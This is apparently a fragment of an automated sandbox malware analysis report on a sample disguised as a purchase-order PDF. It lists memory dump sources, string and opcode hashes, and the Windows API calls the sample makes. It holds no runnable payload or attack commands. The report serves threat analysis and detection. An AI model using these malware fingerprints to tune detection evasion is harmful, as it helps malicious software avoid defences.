                                                                                                                                    • Instruction Fuzzy Hash: B8E0B6B4600209BFEB109B64ED49F7B7AADEB04708F004665BD50F6191DB74EC158B78
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289424698.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_150000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Xaq$Xaq$Xaq$Xaq
                                                                                                                                    • API String ID: 0-4015495023
                                                                                                                                    • Opcode ID: 2310ad971a8b1e869c91747075bcfa14324dd28d19afc4d24b597f6de2179574
                                                                                                                                    • Instruction ID: d4e9dab8f39941d4807bb746bb3e883c7bab08cbae09ff8039cc1c651b44569c
                                                                                                                                    • Opcode Fuzzy Hash: 2310ad971a8b1e869c91747075bcfa14324dd28d19afc4d24b597f6de2179574
                                                                                                                                    • Instruction Fuzzy Hash: F031EB34D0031ADFCF668FA9854036EBBB6BF84301F1440A9CC25AB255DB70CD88CB92
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289424698.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_150000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: \;]q$\;]q$\;]q$\;]q
                                                                                                                                    • API String ID: 0-2351511683
                                                                                                                                    • Opcode ID: ed7399dd2b589ea73bb145f39a9050ee42da26fa8b504d77b9f65dac65584062
                                                                                                                                    • Instruction ID: d5e6b02a1461b737b8bcbe744c2e3c09bba4c5f6d9dd295da6f29a1d66d554f1
                                                                                                                                    • Opcode Fuzzy Hash: ed7399dd2b589ea73bb145f39a9050ee42da26fa8b504d77b9f65dac65584062
                                                                                                                                    • Instruction Fuzzy Hash: 8101D431740905CFCB688E2DC4A092577EBAF8877A7264469E865CF370DB35DC45C781
                                                                                                                                    APIs
                                                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                                                    • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BB7
                                                                                                                                    • CharNextA.USER32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BC8
                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289624666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000003.00000002.3289589572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289669979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289693951.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289720615.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 190613189-0
                                                                                                                                    • Opcode ID: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                                                    • Instruction ID: ee410971918da6c20df7c5ac797640abd601cb5b02c8e88895b13af08820b85c
                                                                                                                                    • Opcode Fuzzy Hash: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                                                    • Instruction Fuzzy Hash: 22F06231104958AFC7029BA5DD4099FBBB8EF55254B2540A9E840F7211D674FE019BA9